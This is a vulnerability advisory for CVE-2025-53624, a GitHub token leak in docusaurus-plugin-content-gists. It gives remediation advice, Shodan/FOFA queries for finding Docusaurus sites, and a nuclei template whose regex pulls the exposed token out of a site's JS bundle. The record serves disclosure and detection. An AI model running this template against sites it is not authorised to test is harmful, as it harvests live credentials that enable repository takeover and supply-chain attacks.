docusaurus-plugin-content-gists GitHub Personal Access Token Exposure

Vulnerability Information

Vulnerability name: docusaurus-plugin-content-gists GitHub Personal Access Token Exposure

Vulnerability ID:

  • CVE: CVE-2025-53624

Vulnerability type: Information disclosure

Severity: High

Description: docusaurus-plugin-content-gists is a plugin that adds a page to a Docusaurus instance to display a GitHub user's public gists. Versions prior to 4.0.0 contain an information-disclosure vulnerability: when a GitHub personal access token is passed through the plugin's configuration options, it is inadvertently included in the client-side JavaScript bundle, so anyone who can view the site's source code can obtain the token. The token was intended only for build-time API access. Exposure of a GitHub personal access token can give an attacker unauthorized access to your repositories and organization resources, leading to data exfiltration, code injection and supply-chain attacks. The technical root cause is that the plugin did not properly filter or encrypt sensitive information such as the personal access token when handling its configuration options, so the value was carried through the build into the front-end output. All users of the plugin should upgrade to 4.0.0 or later immediately and revoke the GitHub personal access token that was previously used.

Vendor: webbertakken

Product: docusaurus-plugin-content-gists

Affected versions: < 4.0.0

Search syntax (Shodan / FOFA): http.html:"Docusaurus" || body="Docusaurus"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/f461ae7b37f2e38c2202555d3aae050f20ac1cb7/http%2Fcves%2F2025%2FCVE-2025-53624.yaml

Type: projectdiscovery/nuclei-templates:github issues

PoC Details


id: CVE-2025-53624

info:
  name: docusaurus-plugin-content-gists < 4.0.0 - GitHub Personal Access Token Exposure
  author: darses
  severity: high
  description: |
    The Docusaurus gists plugin adds a page to your Docusaurus instance, displaying all public gists of a GitHub user. docusaurus-plugin-content-gists versions prior to 4.0.0 are vulnerable to exposing GitHub Personal Access Tokens in production build artifacts when passed through plugin configuration options. The token, intended for build-time API access only, is inadvertently included in client-side JavaScript bundles, making it accessible to anyone who can view the website's source code.
  impact: |
    A GitHub personal access token exposure vulnerability can grant an attacker unauthorized access to your repositories and organization resources, potentially leading to data exfiltration, code injection, and supply chain attacks.
  remediation: |
    Update docusaurus-plugin-content-gists to version 4.0.0+. Revoke access to the GitHub PAT that was used: https://github.com/settings/tokens.
  reference:
    - https://github.com/webbertakken/docusaurus-plugin-content-gists/commit/8d4230b82412edb215ddfa9e609d178510a5fe31
    - https://github.com/webbertakken/docusaurus-plugin-content-gists/security/advisories/GHSA-qf34-qpr4-5pph
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cve-id: CVE-2025-53624
    cwe-id: CWE-200
  metadata:
    verified: true
    vendor: webbertakken
    product: docusaurus_plugin_content_gists
    shodan-query:
      - http.html:"Docusaurus"
    fofa-query:
      - body="Docusaurus"
  tags: cve,cve2025,docusaurus,exposure

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/"

    matchers-condition: and
    matchers:
      - type: word
        internal: true
        words:
          - 'name="generator" content="Docusaurus'
        part: body

      - type: status
        internal: true
        status:
          - 200

    extractors:
      - type: regex
        name: js_file_url
        internal: true
        group: 1
        regex:
          - '<script src="/(assets/js/main\.[^"]*\.js)"'

  - method: GET
    path:
      - "{{BaseURL}}{{js_file_url}}"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "personalAccessToken"
        part: body

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: github_token
        group: 1
        regex:
          - ',personalAccessToken:"([^"]*)"}'



Author: lianccc
Published: 2025-07-10